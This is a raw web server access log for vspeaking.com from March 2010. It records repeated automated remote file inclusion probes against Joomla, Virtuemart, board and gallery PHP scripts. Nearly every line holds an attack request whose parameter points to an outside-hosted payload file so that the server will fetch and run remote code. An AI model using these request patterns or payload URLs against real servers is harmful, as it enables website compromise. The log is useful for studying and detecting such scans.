125.160.17.201 - - [08/Mar/2010:02:48:05 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:48:32 -0800] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:51:42 -0800] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.194 - - [08/Mar/2010:02:52:30 -0800] "GET /logs/access.log/port.php?content=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.194 - - [08/Mar/2010:02:52:30 -0800] "GET /port.php?content=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.168.12.194 - - [08/Mar/2010:02:52:30 -0800] "GET /logs/port.php?content=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:53:08 -0800] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:54:52 -0800] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:55:21 -0800] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
125.160.17.201 - - [08/Mar/2010:02:56:05 -0800] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt?????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:03:10:55 -0800] "GET /include/write.php?dir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:03:10:55 -0800] "GET /logs//include/write.php?dir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
87.224.132.89 - - [08/Mar/2010:03:10:55 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:03:17:07 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:03:17:07 -0800] "GET /logs/access_100118.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:03:17:07 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.129.170.49 - - [08/Mar/2010:03:21:30 -0800] "GET /logs/access.log//bbs/write_comment_update.php?board_skin_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.129.170.49 - - [08/Mar/2010:03:21:30 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
118.129.170.49 - - [08/Mar/2010:03:21:30 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:32:34 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:32:34 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:32:34 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
110.45.145.178 - - [08/Mar/2010:03:32:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:33:13 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:33:13 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:33:22 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:33:22 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:33:22 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:33:29 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "vspeaking.com"
187.79.13.234 - - [08/Mar/2010:03:33:42 -0800] "GET /logs/access_091228.log?lang=http%3A%2F%2Fwww.joaomatosf.com%2Fteste.txt%3F HTTP/1.1" 404 - "-" "Jakarta Commons-HttpClient/3.1" "www.vspeaking.com"
110.45.145.178 - - [08/Mar/2010:03:35:02 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.145.178 - - [08/Mar/2010:03:35:03 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.vspeaking.com"
110.45.145.178 - - [08/Mar/2010:03:35:03 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:35:31 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:35:31 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:35:31 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:35:39 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:35:39 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:35:39 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:39:47 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:39:47 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:39:47 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:03:40:17 -0800] "GET /errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:03:40:17 -0800] "GET /logs/errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:03:40:17 -0800] "GET /logs/access.log/errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:03:40:30 -0800] "GET /logs/access.log/errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:03:40:30 -0800] "GET /logs/errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:03:40:30 -0800] "GET /errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
207.46.204.179 - - [08/Mar/2010:03:40:57 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
207.46.204.179 - - [08/Mar/2010:03:41:56 -0800] "GET /logs/access_091122.log HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:03:43:37 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
58.150.99.144 - - [08/Mar/2010:03:43:59 -0800] "GET /logs/access.log%20%20/errors.php?error=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:44:59 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:44:59 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:03:44:59 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.130.32.85 - - [08/Mar/2010:03:46:34 -0800] "GET /logs/access_091228.log/old_reports.php?file=http://www.akarin.de/bilder/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.130.32.85 - - [08/Mar/2010:03:46:34 -0800] "GET /old_reports.php?file=http://www.akarin.de/bilder/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.130.32.85 - - [08/Mar/2010:03:46:34 -0800] "GET /logs/old_reports.php?file=http://www.akarin.de/bilder/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
188.130.32.85 - - [08/Mar/2010:03:46:37 -0800] "GET /logs/access_100104.log/old_reports.php?file=http://www.akarin.de/bilder/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.103.87.96 - - [08/Mar/2010:04:06:25 -0800] "GET /write_update.php?board_skin_path=http://www.dialog-kiado.hu/szerzokpdf/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.103.87.96 - - [08/Mar/2010:04:06:25 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://www.dialog-kiado.hu/szerzokpdf/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.103.87.96 - - [08/Mar/2010:04:06:25 -0800] "GET /logs/write_update.php?board_skin_path=http://www.dialog-kiado.hu/szerzokpdf/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:32:51 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:32:51 -0800] "GET /logs/access.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:32:51 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:33:11 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:33:11 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:33:11 -0800] "GET /logs/access.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:33:17 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:33:17 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:33:17 -0800] "GET /logs/access.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:33:41 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:33:41 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:33:41 -0800] "GET /logs/access.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:04:35:36 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:04:35:36 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:04:35:36 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:04:35:38 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:04:35:38 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:04:35:38 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
83.103.72.130 - - [08/Mar/2010:04:52:59 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
83.103.72.130 - - [08/Mar/2010:04:52:59 -0800] "GET /logs//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
83.103.72.130 - - [08/Mar/2010:04:52:59 -0800] "GET /logs/access.log%20%20//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
83.103.72.130 - - [08/Mar/2010:04:57:33 -0800] "GET /logs/access.log//administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:04:58:51 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:04:58:51 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:04:58:51 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:59:10 -0800] "GET /logs/access.log/write_update.tail.skin.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:59:10 -0800] "GET /write_update.tail.skin.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:59:10 -0800] "GET /logs/write_update.tail.skin.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:59:15 -0800] "GET /logs/write_update.tail.skin.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:59:15 -0800] "GET /logs/access.log/write_update.tail.skin.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:59:15 -0800] "GET /write_update.tail.skin.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:59:43 -0800] "GET /write_update.tail.skin.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:59:43 -0800] "GET /logs/access.log/write_update.tail.skin.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
67.227.136.138 - - [08/Mar/2010:04:59:43 -0800] "GET /logs/write_update.tail.skin.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:05:00:01 -0800] "GET /logs/access.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:05:00:01 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.40.227 - - [08/Mar/2010:05:00:01 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:05:10:31 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:05:10:40 -0800] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:05:10:40 -0800] "GET /logs/access_091228.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [08/Mar/2010:05:24:25 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [08/Mar/2010:05:24:27 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
200.93.147.154 - - [08/Mar/2010:05:24:28 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:05:29:24 -0800] "GET /admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:05:29:24 -0800] "GET /logs/access.log//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:05:29:24 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:05:31:04 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:05:31:04 -0800] "GET /logs/access.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
222.237.78.176 - - [08/Mar/2010:05:31:04 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
75.125.21.66 - - [08/Mar/2010:05:34:41 -0800] "GET /logs//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
75.125.21.66 - - [08/Mar/2010:05:34:41 -0800] "GET /administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
75.125.21.66 - - [08/Mar/2010:05:34:41 -0800] "GET /logs/access.log%20%20//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
75.125.21.66 - - [08/Mar/2010:05:35:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
75.125.21.66 - - [08/Mar/2010:05:35:00 -0800] "GET /administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
75.125.21.66 - - [08/Mar/2010:05:35:00 -0800] "GET /logs//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
75.125.21.66 - - [08/Mar/2010:05:37:28 -0800] "GET /logs//administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
